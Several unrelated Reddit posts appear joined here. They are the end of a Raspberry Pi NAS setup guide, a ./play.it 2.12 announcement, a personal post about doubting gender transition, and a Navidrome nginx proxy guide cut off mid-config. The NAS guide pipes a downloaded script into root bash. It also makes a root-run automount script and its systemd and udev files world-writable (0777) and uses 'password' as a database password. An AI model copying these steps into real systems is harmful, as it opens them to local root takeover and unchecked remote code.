$ sudo mkfs.ext4 -L RED -m .1 -E stride=32,stripe-width=64 /dev/md/RED
$ sudo mount /dev/md/RED /NAS/RED
The filesystem used is ext4, because it's the fastest. The RAID array is located at /dev/md/RED, and mounted to /NAS/RED.
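You can check the health of the array at any time with the kernel's mdstat interface:

$ cat /proc/mdstat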

fstab

To automount the disks at boot, we will modify the fstab file. Before doing so you will need to know the UUID of every disk you want to mount at boot. You can find out these issuing the command ls -al /dev/disk/by-uuid.
$ sudo nano /etc/fstab
# Disk 1
UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx /NAS/Disk1 ext4 auto,nofail,noatime,rw,user,sync 0 0
For every disk add a line like this. To verify the functionality of fstab issue the command sudo mount -a.

S.M.A.R.T.

To monitor your disks, the S.M.A.R.T. utilities are a super powerful tool.
$ sudo apt install smartmontools
$ sudo nano /etc/default/smartmontools
start_smartd=yes 
$ sudo nano /etc/smartd.conf
/dev/disk/by-uuid/UUID -a -I 190 -I 194 -d sat -d removable -o on -S on -n standby,48 -s (S/../.././04|L/../../1/04) -m yourmail@something.com 
$ sudo service smartd restart
For every disk you want to monitor add a line like the one above.
About the flags:
· -a: full scan.
· -I 190, -I 194: ignore the 190 and 194 parameters, since those are the temperature value and would trigger the alarm at every temperature variation.
· -d sat, -d removable: removable SATA disks.
· -o on: offline testing, if available.
· -S on: attribute saving, between power cycles.
· -n standby,48: check the drives every 30 minutes (default behavior) only if they are spinning, or after 24 hours of delayed checks.
· -s (S/../.././04|L/../../1/04): short test every day at 4 AM, long test every Monday at 4 AM.
· -m yourmail@something.com: email address to which send alerts in case of problems.

Automount USB devices

Two steps ago we set up the fstab file in order to mount the disks at boot. But what if you want to mount a USB disk immediately when plugged in? Since I had a few troubles with the existing solutions, I wrote one myself, using udev rules and services.
$ sudo apt install pmount
$ sudo nano /etc/udev/rules.d/11-automount.rules
ACTION=="add", KERNEL=="sd[a-z][0-9]", TAG+="systemd", ENV{SYSTEMD_WANTS}="automount-handler@%k.service" 
$ sudo chmod 0777 /etc/udev/rules.d/11-automount.rules
$ sudo nano /etc/systemd/system/automount-handler@.service
[Unit]
Description=Automount USB drives
BindsTo=dev-%i.device
After=dev-%i.device

[Service]
Type=oneshot
RemainAfterExit=yes
ExecStart=/usr/local/bin/automount %I
ExecStop=/usr/bin/pumount /dev/%I
$ sudo chmod 0777 /etc/systemd/system/automount-handler@.service
$ sudo nano /usr/local/bin/automount
#!/bin/bash
PART=$1
FS_UUID=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $3}'`
FS_LABEL=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $2}'`
DISK1_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'
DISK2_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'
if [ ${FS_UUID} == ${DISK1_UUID} ] || [ ${FS_UUID} == ${DISK2_UUID} ]; then
    sudo mount -a
    sudo chmod 0777 /NAS/${FS_LABEL}
else
    if [ -z ${FS_LABEL} ]; then
        /usr/bin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${PART}
    else
        /usr/bin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${FS_LABEL}
    fi
fi
$ sudo chmod 0777 /usr/local/bin/automount
The udev rule triggers when the kernel announce a USB device has been plugged in, calling a service which is kept alive as long as the USB remains plugged in. The service, when started, calls a bash script which will try to mount any known disk using fstab, otherwise it will be mounted to a default location, using its label (if available, partition name is used otherwise).

Netdata

Let's now install netdata. For this another handy script will help us.
$ sudo bash <(curl -Ss https://my-netdata.io/kickstart.sh)
Once the installation process completes, we can open our dashboard to the internet. We will use Nginx as a reverse proxy.
$ sudo apt install python-certbot-nginx
$ sudo nano /etc/nginx/sites-available/20-netdata
upstream netdata {
    server unix:/var/run/netdata/netdata.sock;
    keepalive 64;
}
server {
    listen 80;
    server_name netdata.naspi.webredirect.org;
    location / {
        proxy_set_header X-Forwarded-Host $host;
        proxy_set_header X-Forwarded-Server $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://netdata;
        proxy_http_version 1.1;
        proxy_pass_request_headers on;
        proxy_set_header Connection "keep-alive";
        proxy_store off;
    }
}
$ sudo ln -s /etc/nginx/sites-available/20-netdata /etc/nginx/sites-enabled/20-netdata
$ sudo nano /etc/netdata/netdata.conf
# NetData configuration
[global]
    hostname = NASPi
[web]
    allow netdata.conf from = localhost fd* 192.168.* 172.*
    bind to = unix:/var/run/netdata/netdata.sock
To enable SSL, issue the following command, select the correct domain and make sure to redirect every request to HTTPS.
$ sudo certbot --nginx
Now configure the alarm notifications. I suggest you read through the stock file before modifying it, to see every service you could enable. You'll spend some time on it, yes, but eventually you will be very satisfied.
$ sudo nano /etc/netdata/health_alarm_notify.conf
# Alarm notification configuration
# email global notification options
SEND_EMAIL="YES"
# Sender address
EMAIL_SENDER="NetData netdata@naspi.webredirect.org"
# Recipients addresses
DEFAULT_RECIPIENT_EMAIL="youremail@something.com"
# telegram (telegram.org) global notification options
SEND_TELEGRAM="YES"
# Bot token
TELEGRAM_BOT_TOKEN="xxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# Chat ID
DEFAULT_RECIPIENT_TELEGRAM="xxxxxxxxx"
###############################################################################
# RECIPIENTS PER ROLE
# generic system alarms
role_recipients_email[sysadmin]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[sysadmin]="${DEFAULT_RECIPIENT_TELEGRAM}"
# DNS related alarms
role_recipients_email[domainadmin]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[domainadmin]="${DEFAULT_RECIPIENT_TELEGRAM}"
# database servers alarms
role_recipients_email[dba]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[dba]="${DEFAULT_RECIPIENT_TELEGRAM}"
# web servers alarms
role_recipients_email[webmaster]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[webmaster]="${DEFAULT_RECIPIENT_TELEGRAM}"
# proxy servers alarms
role_recipients_email[proxyadmin]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[proxyadmin]="${DEFAULT_RECIPIENT_TELEGRAM}"
# peripheral devices
role_recipients_email[sitemgr]="${DEFAULT_RECIPIENT_EMAIL}"
role_recipients_telegram[sitemgr]="${DEFAULT_RECIPIENT_TELEGRAM}"
$ sudo service netdata restart

Samba

Now, let's start setting up the real NAS part of this project: the disk sharing system. First we'll set up Samba, for the sharing within your LAN.
$ sudo apt install samba samba-common-bin
$ sudo nano /etc/samba/smb.conf
[global]
# Network
workgroup = NASPi
interfaces = 127.0.0.0/8 eth0
bind interfaces only = yes
# Log
log file = /var/log/samba/log.%m
max log size = 1000
logging = file syslog@1
panic action = /usr/share/samba/panic-action %d
# Server role
server role = standalone server
obey pam restrictions = yes
# Sync the Unix password with the SMB password.
unix password sync = yes
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
pam password change = yes
map to guest = bad user
security = user
#======================= Share Definitions =======================
[Disk 1]
comment = Disk1 on LAN
path = /NAS/RED
valid users = NAS
force group = NAS
create mask = 0777
directory mask = 0777
writeable = yes
admin users = NASdisk
$ sudo service smbd restart
Now let's add a user for the share:
$ sudo useradd NASbackup -m -G users,NAS
$ sudo passwd NASbackup
$ sudo smbpasswd -a NASbackup
And at last let's open the needed ports in the firewall:
$ sudo nano /etc/nftables.conf
# samba
tcp dport 139 accept
tcp dport 445 accept
udp dport 137 accept
udp dport 138 accept
$ sudo service nftables restart

NextCloud

Now let's set up the service to share disks over the internet. For this we'll use NextCloud, which is something very similar to Google Drive, but opensource.
$ sudo apt install php-xmlrpc php-soap php-apcu php-smbclient php-ldap php-redis php-imagick php-mcrypt
First of all, we need to create a database for nextcloud.
$ sudo mysql -u root -p
CREATE DATABASE nextcloud;
CREATE USER nextclouduser@localhost IDENTIFIED BY 'password';
GRANT ALL ON nextcloud.* TO nextclouduser@localhost IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
EXIT;
Then we can move on to the installation.
$ cd /tmp && wget https://download.nextcloud.com/server/releases/latest.zip
$ sudo unzip latest.zip
$ sudo mv nextcloud /var/www/html/nextcloud/
$ sudo chown -R www-data:www-data /var/www/html/nextcloud/
$ sudo chmod -R 755 /var/www/html/nextcloud/
$ sudo nano /etc/nginx/sites-available/10-nextcloud
upstream nextcloud {
    server 127.0.0.1:9999;
    keepalive 64;
}
server {
    server_name naspi.webredirect.org;
    root /var/www/nextcloud;
    listen 80;
    add_header Referrer-Policy "no-referrer" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-Download-Options "noopen" always;
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Permitted-Cross-Domain-Policies "none" always;
    add_header X-Robots-Tag "none" always;
    add_header X-XSS-Protection "1; mode=block" always;
    fastcgi_hide_header X-Powered_By;
    location = /robots.txt {
        allow all;
        log_not_found off;
        access_log off;
    }
    rewrite ^/.well-known/host-meta /public.php?service=host-meta last;
    rewrite ^/.well-known/host-meta.json /public.php?service=host-meta-json last;
    rewrite ^/.well-known/webfinger /public.php?service=webfinger last;
    location = /.well-known/carddav { return 301 $scheme://$host:$server_port/remote.php/dav; }
    location = /.well-known/caldav { return 301 $scheme://$host:$server_port/remote.php/dav; }
    client_max_body_size 512M;
    fastcgi_buffers 64 4K;
    gzip on;
    gzip_vary on;
    gzip_comp_level 4;
    gzip_min_length 256;
    gzip_proxied expired no-cache no-store private no_last_modified no_etag auth;
    gzip_types application/atom+xml application/javascript application/json application/ld+json application/manifest+json application/rss+xml application/vnd.geo+json application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/bmp image/svg+xml image/x-icon text/cache-manifest text/css text/plain text/vcard text/vnd.rim.location.xloc text/vtt text/x-component text/x-cross-domain-policy;
    location / {
        rewrite ^ /index.php;
    }
    location ~ ^\/(?:build|tests|config|lib|3rdparty|templates|data)\/ {
        deny all;
    }
    location ~ ^\/(?:\.|autotest|occ|issue|indie|db_|console) {
        deny all;
    }
    location ~ ^\/(?:index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+)\.php(?:$|\/) {
        fastcgi_split_path_info ^(.+?\.php)(\/.*|)$;
        set $path_info $fastcgi_path_info;
        try_files $fastcgi_script_name =404;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $path_info;
        fastcgi_param HTTPS on;
        fastcgi_param modHeadersAvailable true;
        fastcgi_param front_controller_active true;
        fastcgi_pass nextcloud;
        fastcgi_intercept_errors on;
        fastcgi_request_buffering off;
    }
    location ~ ^\/(?:updater|oc[ms]-provider)(?:$|\/) {
        try_files $uri/ =404;
        index index.php;
    }
    location ~ \.(?:css|js|woff2?|svg|gif|map)$ {
        try_files $uri /index.php$request_uri;
        add_header Cache-Control "public, max-age=15778463";
        add_header Referrer-Policy "no-referrer" always;
        add_header X-Content-Type-Options "nosniff" always;
        add_header X-Download-Options "noopen" always;
        add_header X-Frame-Options "SAMEORIGIN" always;
        add_header X-Permitted-Cross-Domain-Policies "none" always;
        add_header X-Robots-Tag "none" always;
        add_header X-XSS-Protection "1; mode=block" always;
        access_log off;
    }
    location ~ \.(?:png|html|ttf|ico|jpg|jpeg|bcmap)$ {
        try_files $uri /index.php$request_uri;
        access_log off;
    }
}
$ sudo ln -s /etc/nginx/sites-available/10-nextcloud /etc/nginx/sites-enabled/10-nextcloud
Now enable SSL and redirect everything to HTTPS
$ sudo certbot --nginx
$ sudo service nginx restart
Immediately after, navigate to the page of your NextCloud and complete the installation process, providing the details about the database and the location of the data folder, which is nothing more than the location of the files you will save on the NextCloud. Because it might grow large, I suggest you specify a folder on an external disk.

Minarca

Now to the backup system. For this we'll use Minarca, a web interface based on rdiff-backup. Since the binaries are not available for our OS, we'll need to compile it from source. It's not a big deal, even our small Raspberry Pi 4 can handle the process.
$ cd /home/pi/Documents
$ sudo git clone https://gitlab.com/ikus-soft/minarca.git
$ cd /home/pi/Documents/minarca
$ sudo make build-server
$ sudo apt install ./minarca-server_x.x.x-dxxxxxxxx_xxxxx.deb
$ sudo nano /etc/minarca/minarca-server.conf
# Minarca configuration.
# Logging
LogLevel=DEBUG
LogFile=/var/log/minarca/server.log
LogAccessFile=/var/log/minarca/access.log
# Server interface
ServerHost=0.0.0.0
ServerPort=8080
# rdiffweb
Environment=development
FavIcon=/opt/minarca/share/minarca.ico
HeaderLogo=/opt/minarca/share/header.png
HeaderName=NAS Backup Server
WelcomeMsg=Backup system based on rdiff-backup, hosted on RaspberryPi 4. <a href="https://gitlab.com/ikus-soft/minarca/-/blob/master/doc/index.md">docs</a>
DefaultTheme=default
# Enable Sqlite DB Authentication.
SQLiteDBFile=/etc/minarca/rdw.db
# Directories
MinarcaUserSetupDirMode=0777
MinarcaUserSetupBaseDir=/NAS/Backup/Minarca/
Tempdir=/NAS/Backup/Minarca/tmp/
MinarcaUserBaseDir=/NAS/Backup/Minarca/
$ sudo mkdir /NAS/Backup/Minarca/
$ sudo chown minarca:minarca /NAS/Backup/Minarca/
$ sudo chmod 0750 /NAS/Backup/Minarca/
$ sudo service minarca-server restart
As always we need to open the required ports in our firewall settings:
$ sudo nano /etc/nftables.conf
# minarca
tcp dport 8080 accept
$ sudo service nftables restart
And now we can open it to the internet:
$ sudo nano /etc/nginx/sites-available/30-minarca
upstream minarca {
    server 127.0.0.1:8080;
    keepalive 64;
}
server {
    server_name minarca.naspi.webredirect.org;
    location / {
        proxy_set_header X-Forwarded-Host $host;
        proxy_set_header X-Forwarded-Server $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://minarca;
        proxy_http_version 1.1;
        proxy_pass_request_headers on;
        proxy_set_header Connection "keep-alive";
        proxy_store off;
    }
    listen 80;
}
$ sudo ln -s /etc/nginx/sites-available/30-minarca /etc/nginx/sites-enabled/30-minarca
And enable SSL support, with HTTPS redirect:
$ sudo certbot --nginx
$ sudo service nginx restart

DNS records

As last thing you will need to set up your DNS records, in order to avoid having your mail rejected or sent to spam.

MX record

name: @
value: mail.naspi.webredirect.org
TTL (if present): 90

PTR record

For this you need to ask your ISP to modify the reverse DNS for your IP address.

SPF record

name: @
value: v=spf1 mx ~all
TTL (if present): 90

DKIM record

To get the value of this record you'll need to run the command sudo amavisd-new showkeys. The value is between the parentheses (it should start with v=DKIM1), but remember to remove the double quotes and the line breaks.
name: dkim._domainkey
value: v=DKIM1; p= ...
TTL (if present): 90

DMARC record

name: _dmarc
value: v=DMARC1; p=none; pct=100; rua=mailto:dmarc@naspi.webredirect.org
TTL (if present): 90

Router ports

If you want your site to be accessible from over the internet you need to open some ports on your router. Here is a list of mandatory ports, but you can choose to open other ports, for instance the port 8080 if you want to use minarca even outside your LAN.

mailserver ports

25 (SMTP)
110 (POP3)
143 (IMAP)
587 (mail submission)
993 (secure IMAP)
995 (secure POP3)

ssh port

If you want to open your SSH port, I suggest you to move it to something different from the port 22 (default port), to mitigate attacks from the outside.

HTTP/HTTPS ports

80 (HTTP)
443 (HTTPS)

The end?

And now the server is complete. You have a mailserver capable of receiving and sending emails, a super monitoring system, a cloud server to have your files wherever you go, a samba share to have your files on every computer at home, a backup server for every device you own, a webserver if you ever want to have a personal website.
But now you can do whatever you want, add things, tweak settings and so on. Your imagination is your only limit (almost).
EDIT: typos ;)
submitted by Fly7113 to raspberry_pi [link] [comments]

./play.it 2.12: API, GUI and video games

./play.it 2.12: API, GUI and video games

./play.it is a free/libre software that builds native packages for several Linux distributions from DRM-free installers for a collection of commercial games. These packages can then be installed using the standard distribution-provided tools (APT, pacman, emerge, etc.).
A more complete description of ./play.it has already been posted in r/linux_gaming a couple of months ago: ./play.it, an easy way to install commercial games on GNU/Linux
It's already been one year since version 2.11 was released, in January 2019. We will only briefly review the changelog of version 2.12 and focus on the different points of ./play.it that kept us busy during all this time, and of which coding was only a small part.

What’s new with 2.12?

Though not the focus of this article, it would be a pity not to present all the added features of this brand new version. ;)
Compared to the usual updates, 2.12 is a major one, especially since for two years we slowed down the addition of new features. Some patches had been gathering dust since the end of 2018 before finally being integrated in this update!
The list of changes for this 2.12 release can be found on our forge. Here is a full copy for convenience:

Development migration

History

As many free/libre projects, ./play.it development started on some random sector of a creaking hard drive, and unsurprisingly, a whole part of its history (everything predating version 1.13.15, released on March 30th, 2016) disappeared into limbo because some unwise operation destroyed the only copy of the repository… Lesson learned: what's not shared doesn't stay around long, and so was born the first public Git repository of the project. The easing of collaborative work was only accidentally achieved by this quest for eternity, but wasn't the original motivation for making the repository publicly available.
Following this decision, ./play.it source code has been hosted successively by many shared forge platforms:

Dedicated forge

As development progressed, ./play.it began to need more resources, dividing its code into several repositories to improve the workflow of the different aspects of the project, adding continuous integration tests and their constraints, etc. A furious desire to understand the nooks and crannies of a forge platform was the final deciding factor towards hosting a dedicated forge.
So it happened: we deployed a forge platform on a dedicated server, benefiting hugely from the tremendous work achieved by the Debian team that maintains the GitLab package. In return, we tried to contribute our findings back to improve this packaging.
That was not planned, but this migration happened just a short time before the announcement “Déframasoftisons Internet !” (French article) about the planned end of Framagit.
This dedicated instance used to be hosted on a VPS rented from Digital Ocean until the second half of July 2020, and has since been moved to another VPS, rented from Hetzner. The specifications are similar, as is the service, but thanks to this migration our hosting costs have been cut in half. Keep in mind that this is paid for by a single person, so any little donation helps a lot on this front. ;)
To the surprise of our system administrator, this last migration took only a couple hours with no service interruption reported by our users.

Forge access

This new forge can be found at forge.dotslashplay.it. Registrations are open to the public, but we ask you to not abuse this, the main restriction being that we do not wish to host projects unrelated to ./play.it. Of course exceptions are made for our active contributors, who are allowed to host some personal projects there.
So, if you wish to use this forge to host your own work, you first need to make some significant contributions to ./play.it.

API

With the collection of supported games growing endlessly, we have started developing a public API giving access to lots of information related to ./play.it.
This API, which is not yet stabilized, is simply an interface to a versioned database containing all the ./play.it scripts, the archives they handle, and the games installable through the project. Relations are, of course, maintained between those items, enabling requests like: «What packages are required on my system to install Cæsar Ⅲ?» or «What are the free (as in beer) games handled via DOSBox?».
Originally developed as support for the new, in-development website (we'll talk about it later on), this API should facilitate the development of tools around ./play.it. For example, it'll be useful for whoever would like to build a complete video game handling application (downloading, installation, launching, etc.) using ./play.it as one of its building blocks.
For those curious about the technical side, it's an API based on Lumen making requests on a MariaDB database, all self-hosted on Debian Sid. Not only is the code of the API versioned on our forge, but so are the structure and content of the databases, which will allow anyone who wants to easily install a local copy.
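As a purely hypothetical illustration (the host, route and fields below are invented, since the API is not yet stabilized), a third-party tool could query it along these lines:
```
# Hypothetical sketch only: the real endpoint names and response shape may differ.
curl -s 'https://api.example.org/games?engine=dosbox&free=yes' \
  | jq -r '.[].title'   # assumes a JSON array of game objects with a "title" field
```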

New website

Based on the aforementioned API, a new website is under development and will replace our current website based on DokuWiki.
Indeed, while DokuWiki's lack of a database and plain-text file structure seemed attractive at first, when ./play.it supported only a handful of games (link in French), these features became more inconvenient as the library of supported games grew.
We shall make an in-depth presentation of this website for the 2.13 release of ./play.it, but a public demo of the development version from our forge is already available.
If you feel like lending a helping hand on this task, some priority tasks have been identified that would allow the new website to replace the current one. And for those interested in technical details, this website was developed in PHP using the Laravel framework. The current in-development version is hosted for now on the same Debian Sid machine as the API.

GUI

A regular comment about the project is that, if the purpose is to make installing games accessible to everyone without technical skills, having to run scripts in a terminal remains somewhat intimidating. Our answer until now has been that the project itself doesn't aim to provide a graphical interface (KISS principle, "Keep it simple, stupid", still and always), but that it would be relatively easy to develop a graphical front-end for it later on.
Well, that is now a reality. Around the time of our latest publication, one of our contributors, using the API we just talked about, developed a small prototype that is usable enough to warrant a little shout-out. :-)
In practice, it is a small amount of Python 3 code (an HCI entirely in POSIX shell is for a later date :-°), using GTK 3 (and still a VTE terminal to display the commands issued, though the user shouldn't have to type anything into it, except perhaps the root password to install some packages). This allowed us to verify that, as we used to say, it would be relatively easy, since a script of less than 500 lines of code (written quickly over a weekend) was enough to do the job!
Of course, this graphical interface project stays independent from the main project, and is maintained in a specific repository. It seems interesting to us to promote it in order to ease the use of ./play.it, but this doesn't prevent other similar projects from being born, for example using a different language or graphical toolkit (overall, we don't have any particular affinity towards Python or GTK).
Using this HCI takes three steps. First, a list of available games is displayed, coming directly from our API; you just need to select from the list (optionally using the search bar) the game you want to install. The interface then switches to a second view, which lists the required files. If several alternatives are available, the user can select the one they want to use. All those files must be in the same directory, and the address bar at the top lets you choose which directory to use (clicking the open button at the top opens a filesystem navigation window). Once all those files are available (if they can be downloaded, the software will do it automatically), you can move on to the third step, which is just watching ./play.it do its job. :-) Once done, a simple click on the button at the bottom will run the game (though from this point the game is fully integrated into your system as usual, so you no longer need this tool to run it).
To download potentially missing files, the HCI will use, depending on what's available on the system, either wget, curl or aria2c (this last one also handling torrents), whose output will be displayed in the terminal of the third phase, just before running the scripts. For privilege escalation to install packages, sudo will be used preferentially if available (with the option to use a third-party application for password input if the corresponding environment variable is set, which is more user-friendly); otherwise su will be used.
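A minimal sketch of that kind of tool detection (an assumption about the approach, not the GUI's actual code) could look like:
```
#!/bin/sh
# Pick the first downloader found on the system; the order here is illustrative.
if command -v wget >/dev/null 2>&1; then
    download() { wget "$1"; }
elif command -v curl >/dev/null 2>&1; then
    download() { curl -L -O "$1"; }
elif command -v aria2c >/dev/null 2>&1; then
    download() { aria2c "$1"; }   # aria2c also handles torrents
else
    echo "no supported downloader found" >&2
    exit 1
fi

# Same idea for privilege escalation: prefer sudo, fall back to su.
if command -v sudo >/dev/null 2>&1; then
    as_root() { sudo "$@"; }
else
    as_root() { su -c "$*"; }
fi
```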
Of course, any suggestion for an improvement will be received with pleasure.

New games

Of course, such an announcement would not be complete without a list of the games that got added to our collection since the 2.11 release… So here you go:
If your favourite game is not yet supported by ./play.it, you should ask for it in the dedicated tracker on our forge. The only requirement for a request to be valid is that a version of the game exists that is not burdened by DRM.

What’s next?

Our team being inexhaustible, work on the future 2.13 version has already begun…
A few major objectives of this next version are:
If your desired features aren't on this list, don't hesitate to let us know in the comments of this news release. ;)

Links

submitted by vv224 to linux_gaming [link] [comments]

To desist or proceed?

EDIT: I figured it out already. Thanks for letting me post, it genuinely helped. I want to leave this up in case anyone else can relate to it. /edit
Hi, everyone. I've been having an identity crisis over the past week or two and it's been affecting my health. Talking out my thoughts with others seems to be helping, so I would like to share my thoughts and am hoping some of you with more experience could offer some advice, or just help me talk through this.
For context, I'm 35, came out 6 years ago at age 29, first identified as FTM and soon afterwards non-binary trans-masculine. I socially transitioned with pushback/little support and changed my name. I've felt like I'm not a girl and questioned whether I was a boy since I was 4 or 5 years old. I live in the US.
When I first came out as FTM, I was blissful. Everything clicked into place, but I felt more alive and more grounded than I'd ever felt in my life. It shook me that I'd never felt this joyful until I was about 30. I wanted it to last forever.
I felt another definite "click" when I read up on butch lesbians a few weeks ago. So I've been thinking I could be a late-blooming lesbian with some serious repression and internalized homophobia to work through. I've been bi this whole time but recently realized I was still very afraid of seriously dating a woman. I grew up in a homophobic, very conservative, and traumatizing household.
I'm not sure why I'm now so distressed that I can't eat or sleep. I think I know myself better than I used to, and that should be a good thing. I might not need surgery or T after all, which is a relief from the seesaw I've been on. Sometimes, I'm still pretty freaked out by how squeaky my voice is and how round my face is, so the option to temporarily go on T until my voice breaks is enticing. Non-binary people have done that. But I'm worried about the other effects it will have on my body. My hormones are already getting out of whack due to age. I'm also a singer and am playing roulette with the future of my music.
I've also been extremely pissed off at, not the entire trans community because it has some genuinely good and helpful people, but some part of it. Maybe this is where most of the distress is coming from. I called it a "cult" before I knew other people did. I know it's not really a cult, but I feel like I've been duped by people with ulterior motives. I thought I was smarter than that; I prided myself on being skeptical. I'm pissed that I was led on but also embarrassed for being so stupid...everyone keeps going on about how they're converting "the kids" and I'm far from a kid.
"You don't know if you have internalized transphobia stopping you from transitioning. You could have it and not know. You should just transition." This taught me not to trust myself, because I can't know myself.
"We all doubted ourselves in the beginning, too, but transitioning worked for us. So you should just transition." This taught me not to trust my intuition. Doubt was unreliable, and possibly transphobic.
"Anyone who disagrees with us is transphobic or old-fashioned, don't listen to them!" This taught me that during my research, anything that didn't match what the "good people" said was from the "bad people" or simply outdated, and not to be trusted. Of course nobody wants to cause harm to others or play for the wrong team, so I listened.
"In the past, we had to memorize scripts and lie to get the hormones and surgery we needed because the medical community is so transphobic that they want to oppress us!" I learned that I was hated and feared by an oppressive majority, and anybody who spoke contrary to what I told by the right and proper side was not to be trusted.
"Cis people don't question their gender. Cis women like being women, even if they don't like gender stereotypes associated with it." Fucking allies supported this statement. Because I have always questioned my gender, the only logical outcome of this was that I must be trans. When J.K. Rowling shared her essay and that she more or less hated being a woman but was still a woman, my whole foundation broke apart.
Before Rowling, the seed of doubt was planted when I got censored and reprimanded on a forum for sharing a link to a detransition site even though it was exactly what the asker had requested. How dare I share information from terfs! Didn't I know they were the enemy? Didn't I know detransition made us look bad to the conservatives who were taking our rights away?
So now that I'm here, I feel awful, like the people I once related to think I'm evil and don't deserve to live. I always felt that pressure to not wind up being "actually cis" too, or I'd be viewed as an oppressive traitor. You know, how they say "it's ok if you decide you're actually just cis" but it didn't really feel like it was ok. And I don't think I'm "cis."
As I've slowly unpacked all this BS and shed the distress that came with it, I've just gotten so angry. I've questioned whether I really am trans in the end, because I don't know who or what to trust anymore.
I legit shortened this as much as I could and it's still a novel. Thanks for reading, and please let me know your thoughts if you have any.
submitted by GenderqueerCrow to detrans [link] [comments]

[GUIDE] navidrome + nginx

Hey all, I love the Navidrome server, and thank you for all the work put in. I know I can't contribute much, but I saw a post earlier about how nginx is missing from the documentation, so I have taken it upon myself to help out by making a stopgap guide for other users. These guides assume you already have a working installation of nginx and Navidrome. If your nginx and Navidrome installs are on separate machines, please amend the proxy_pass IP address and ports.

If you are using a base URL (the part directly after the / on a domain, e.g. https://mydomain.com/navidrome), you can still use the configs in this guide, but you should modify location / { to location /navidrome { if using navidrome as your base URL.

HTTP config

This is for a standard non-HTTPS/SSL configuration and is used as a basic config. Simply create a file /etc/nginx/conf.d/music.conf and input the following, editing YOUR.DOMAIN.HERE to match your dynamic DNS or hostname.
```
server {
    listen 80;
    server_name YOUR.DOMAIN.HERE;

    location / {
        proxy_pass http://localhost:4533/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Forwarded-Protocol $scheme;
        proxy_set_header X-Forwarded-Host $http_host;
        proxy_buffering off;
    }
}
```
Once that has been saved, simply run sudo service nginx restart.
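Tip: nginx can syntax-check a config before you restart it, which applies to every config in this guide:
```
# Validate the config first; restart only if the test passes
sudo nginx -t && sudo service nginx restart
```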

HTTPS/SSL config

This setup is a little harder than plain HTTP, but it is still quite straightforward. This guide assumes you are using certbot for the SSL cert and standard locations for the cert files. Please amend YOURDOMAINHERE.COM to your domain name as required. The full configuration is meant to redirect all non-HTTPS traffic to HTTPS.
Simply create the file /etc/nginx/conf.d/music.conf and input the following:
```
server {
    listen 443 ssl http2;
    server_name YOURDOMAINHERE.COM;

    ssl_certificate /etc/letsencrypt/live/YOURDOMAINHERE.COM/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/YOURDOMAINHERE.COM/privkey.pem;
    include /etc/letsencrypt/options-ssl-nginx.conf;
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
    add_header Strict-Transport-Security "max-age=31536000" always;
    ssl_trusted_certificate /etc/letsencrypt/live/YOURDOMAINHERE.COM/chain.pem;
    ssl_stapling on;
    ssl_stapling_verify on;

    location / {
        proxy_pass http://localhost:4533/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Forwarded-Protocol $scheme;
        proxy_set_header X-Forwarded-Host $http_host;
        proxy_buffering off;
    }
}
```
Save the file and then run
sudo service nginx restart
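Note that the block above only listens on 443. For the promised HTTP-to-HTTPS redirect you also need a port-80 server block; the original config omits it, so here is the standard certbot-style snippet I would assume:
```
# Assumed companion block (not in the original post): send plain HTTP to HTTPS
server {
    listen 80;
    server_name YOURDOMAINHERE.COM;
    return 301 https://$host$request_uri;
}
```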

Paranoid config

This is personally my configuration; due to running multiple servers and back-ends, I just tend to go over the top. (Note: there is a modification to my nginx binary that allows geoip2 to be used for free; this can be found online, or if requested I can make another guide. I have commented out the geoip2 lines, so if you do have a modified binary you can uncomment them and lock out regions you don't wish to publish to.) This config primarily tries to cover as many bases as possible. It is a bit overkill for Navidrome, to be honest, but I can't help doing this on all my servers. This guide assumes you have nginx and Navidrome on the same machine and the standard certbot locations for SSL handling.
Same as before, create /etc/nginx/conf.d/music.conf and insert the following, changing YOURDOMAIN.HERE and, if required, using a different IP and port on the proxy_pass line:
```
server {
    listen 443 ssl http2;
    server_name YOURDOMAIN.HERE;

    # geoip2 lines commented out; they need a geoip2-enabled nginx binary and
    # the corresponding map blocks (not shown) to define these variables
    #if ($lan-ip = yes) {
    #    set $allowed_country yes;
    #}
    #if ($allowed_country = no) {
    #    return 444;
    #}

    ssl_certificate /etc/letsencrypt/live/YOURDOMAIN.HERE/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/YOURDOMAIN.HERE/privkey.pem;
    include /etc/letsencrypt/options-ssl-nginx.conf;
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
